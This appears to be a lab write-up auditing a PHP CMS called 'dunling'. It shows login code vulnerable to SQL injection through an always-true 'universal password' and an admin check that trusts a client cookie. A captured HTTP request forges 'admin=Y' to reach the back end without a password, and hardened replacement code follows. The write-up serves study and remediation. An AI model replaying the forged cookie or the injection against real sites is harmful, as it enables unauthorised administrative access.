
Burp packet-capture test

Single-quote test

login.php
The POST parameters are not filtered, so the login form is vulnerable to SQL injection: both values are concatenated straight into the query string.
A "universal password" (an always-true injection payload) therefore bypasses the login.
<?php
require '../config.php';
$adminname = $_POST['adminname'];
$adminpass = $_POST['adminpass'];
$adminsql = "select * from xwmi_admin where adminname='$adminname' and adminpass='$adminpass'";
$adminery = mysql_query($adminsql, $config);
$adminnum = mysql_num_rows($adminery);
if ($adminnum == "1") {
setcookie("admin", "Y", time() + 3600*24, '/');
setcookie("admin_name", $adminname, time() + 3600*24, '/');
header("location:admin.php");
} else {
header("location:index.php");
}
?>
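As an added example that is not part of the dunling project's code, here is how the same login.php looks once the injection is closed: the username is bound as a prepared-statement parameter, the password is checked with password_verify() against a stored hash, and the logged-in state is kept in a server-side session instead of an "admin=Y" cookie the browser can forge. It assumes ../config.php exposes a PDO connection in $pdo and that xwmi_admin.adminpass stores a password_hash() value rather than plaintext; both are assumptions, not facts from the page.

```php
<?php
// Added example (not the dunling project's code): a hardened login.php.
// Assumptions: ../config.php provides a PDO handle in $pdo, and the
// xwmi_admin.adminpass column holds a password_hash() value, not plaintext.
require '../config.php';

session_start();

$adminname = $_POST['adminname'] ?? '';
$adminpass = $_POST['adminpass'] ?? '';

// Prepared statement: the username travels as a bound parameter, so a single
// quote or an "or 1=1" fragment in the input can no longer change the query.
$stmt = $pdo->prepare('SELECT adminpass FROM xwmi_admin WHERE adminname = ? LIMIT 1');
$stmt->execute([$adminname]);
$row = $stmt->fetch(PDO::FETCH_ASSOC);

// Unknown user and wrong password take the same branch, so the response does
// not reveal which of the two failed.
if ($row !== false && password_verify($adminpass, $row['adminpass'])) {
    session_regenerate_id(true);       // fresh session id after the privilege change
    $_SESSION['admin'] = true;         // login state lives server-side only
    $_SESSION['admin_name'] = $adminname;
    header('Location: admin.php');
    exit;
}

header('Location: index.php');
exit;
```

The original code also relies on the mysql_* extension, which was removed in PHP 7; PDO (or mysqli) with bound parameters is the supported replacement, and the session-based flag is what check.php should test instead of a client-supplied cookie.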


Requesting http://192.168.5.8/dunling/admin/admin.php without a cookie
==>
redirects to http://192.168.5.8/dunling/index.php
admin.php
<?php
require 'check.php';
require '../template/axadmin/head.php';
require '../template/axadmin/banner.php';
require '../template/axadmin/admin.php';
require '../template/axadmin/bottom.php'
?>
check.php
It only checks the value of the admin cookie; if the cookie is present with the expected value it lets the request through to the back end. No user verification is performed (note also that the second line assigns $admin_user in one branch and $user in the other).
<?php
error_reporting(0);
isset($_COOKIE['admin'])?$check=$_COOKIE['admin']:$check=null;
isset($_COOKIE['admin_name'])?$admin_user=$_COOKIE['admin_name']:$user=null;
if($check != "Y" ){header("Location:../index.php");exit;}
?>
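As an added example, not the project's own code, this is the corresponding check.php rewritten to trust only server-side session state. It assumes that login.php sets $_SESSION['admin'] and $_SESSION['admin_name'] after a successful password check; the client then holds nothing but the session id, so sending "admin=Y" in the Cookie header no longer has any effect.

```php
<?php
// Added example (not the dunling project's code): a check.php that does not
// read authorization state from request cookies at all.
// Assumption: login.php sets $_SESSION['admin'] = true after verifying the password.

// Keep the session cookie out of reach of scripts and off cross-site requests
// (array form of session_set_cookie_params requires PHP >= 7.3).
session_set_cookie_params([
    'httponly' => true,
    'samesite' => 'Lax',
    'path'     => '/',
]);
session_start();

// A forged "admin=Y" cookie is never consulted: the only thing that grants
// access is a flag that exists in the server-side session store.
if (empty($_SESSION['admin'])) {
    header('Location: ../index.php');
    exit;
}

$admin_user = $_SESSION['admin_name'] ?? '';
```

With this in place, the captured GET request to admin.php carrying only "admin=Y; admin_name=ajie" is redirected to index.php exactly like an anonymous request, because neither value is read.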
Captured request
GET /dunling/admin/admin.php HTTP/1.1
Host: 192.168.5.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 FS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin=Y; admin_name=ajie
Connection: close

Adding the cookie to the request is enough: as long as it is present, the back end can be reached directly, with no password required.